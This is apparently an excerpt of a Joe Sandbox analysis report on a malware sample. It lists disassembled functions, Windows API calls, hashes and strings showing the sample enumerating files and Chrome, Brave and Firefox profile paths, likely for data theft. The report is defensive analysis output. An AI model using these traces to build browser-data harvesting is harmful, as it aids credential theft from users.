                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                          • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                          • API String ID: 3334442632-726946144
                                          • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                          • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                          • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                          • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                          APIs
                                          • wsprintfA.USER32 ref: 0041492C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                          • FindClose.KERNEL32(000000FF), ref: 00414B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 180737720-445461498
                                          • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                          • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                          • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                          • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                          APIs
                                          • wsprintfA.USER32 ref: 022E3B33
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022E3B4A
                                          • lstrcat.KERNEL32(?,?), ref: 022E3B9C
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 022E3BAE
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 022E3BC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022E3ECE
                                          • FindClose.KERNEL32(000000FF), ref: 022E3EE3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 1125553467-0
                                          • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                          • Instruction ID: a8a3bb34af7e2500e80b847235b5e56733963ffb6ca62fefeb3cc3aa77d66708
                                          • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                          • Instruction Fuzzy Hash: 9FA15EB5A50218ABDF24EFA4CC84FFE737AAF49301F444588A50E96144DB759B84CF62
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                          • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                          • wsprintfA.USER32 ref: 004145A6
                                          • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                          • FindClose.KERNEL32(000000FF), ref: 004146A0
                                          • lstrcatA.KERNEL32(?,009785D8,?,00000104), ref: 004146C5
                                          • lstrcatA.KERNEL32(?,0097BA60), ref: 004146D8
                                          • lstrlenA.KERNEL32(?), ref: 004146E5
                                          • lstrlenA.KERNEL32(?), ref: 004146F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 13328894-2848263008
                                          • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                          • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                          • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                          • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                          APIs
                                          • wsprintfA.USER32 ref: 022E4B93
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                          • FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID:
                                          • API String ID: 180737720-0
                                          • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                          • Instruction ID: 838f3d4b9aca469d24645bc8798263f46c75174758c5e8897a35c85a1cb03794
                                          • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                          • Instruction Fuzzy Hash: 0E6174B5950218ABDF20EFE0DD48FEA73BDFB49300F44858CA60A92144EB75A785CF91
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022DC15C
                                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 022DC1B4
                                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 022DC1CA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DCA26
                                          • FindClose.KERNEL32(000000FF), ref: 022DCA38
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                          • Instruction ID: df2c3f7d76acebd9c2e68c4959fda1890492afc756ecd3781b1ef0ee8e86c9a9
                                          • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                          • Instruction Fuzzy Hash: BA420F72A20304ABCF14FBE4DD95EFD737AAB94300F804559A50BA6198EF349B48DF91
                                          APIs
                                          • wsprintfA.USER32 ref: 00413EC3
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                          • FindClose.KERNEL32(000000FF), ref: 00414081
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 180737720-4073750446
                                          • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                          • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                          • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                          • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                          • wsprintfA.USER32 ref: 022E480D
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022E4852
                                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022E4868
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022E48F2
                                          • FindClose.KERNEL32(000000FF), ref: 022E4907
                                          • lstrcat.KERNEL32(?,0064A524), ref: 022E492C
                                          • lstrcat.KERNEL32(?,0064A22C), ref: 022E493F
                                          • lstrlen.KERNEL32(?), ref: 022E494C
                                          • lstrlen.KERNEL32(?), ref: 022E495D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                          • String ID:
                                          • API String ID: 671575355-0
                                          • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                          • Instruction ID: f81b566ba7c6c0ce209fa75edb4fb1f2668fc2caa8d57bb3833e0d5d236d5231
                                          • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                          • Instruction Fuzzy Hash: 415164B5590218ABDB24EBF0DD88FED737DAB58300F804588E64A96194EB749B84CF91
                                          APIs
                                          • wsprintfA.USER32 ref: 022E412A
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022E4141
                                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022E416F
                                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022E4185
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022E42D3
                                          • FindClose.KERNEL32(000000FF), ref: 022E42E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID:
                                          • API String ID: 180737720-0
                                          • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                          • Instruction ID: 78c0d789e220c9b51374007d8883cbcc2a84244c651a21ddc6774845ccc9e87f
                                          • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                          • Instruction Fuzzy Hash: 265160B6910218ABCF24FBF0DD84EEA737DBB58300F40858CA64A96054EB759B85CF95
                                          APIs
                                          • wsprintfA.USER32 ref: 0040ED3E
                                          • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                          • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                          • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\*.*
                                          • API String ID: 180737720-1013718255
                                          • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                          • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                          • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                          • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                          • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID: 4@$\*.*
                                          • API String ID: 2325840235-1993203227
                                          • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                          • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                          • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                          • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: prefs.js
                                          • API String ID: 3334442632-3783873740
                                          • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                          • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                          • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                          • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                          • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                          • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                          • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                          • FindClose.KERNEL32(000000FF), ref: 00401E32
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 1415058207-1173974218
                                          • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                          • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                          • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                          • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                          APIs
                                          • wsprintfA.USER32 ref: 022DEFA5
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022DEFBC
                                          • StrCmpCA.SHLWAPI(?,00421538), ref: 022DF012
                                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 022DF028
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DF515
                                          • FindClose.KERNEL32(000000FF), ref: 022DF52A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID:
                                          • API String ID: 180737720-0
                                          • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                          • Instruction ID: 8e03b5e54436ad303fc0043610b15a5ff9937c8a3b00a2ba99d05578d2f60643
                                          • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                          • Instruction Fuzzy Hash: A8E1DC729213189ADF58EBA4DD91EEE733AAF64300F8041DDA10B62195EF346BC9DF50
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                          • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                          • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                          • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                          • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
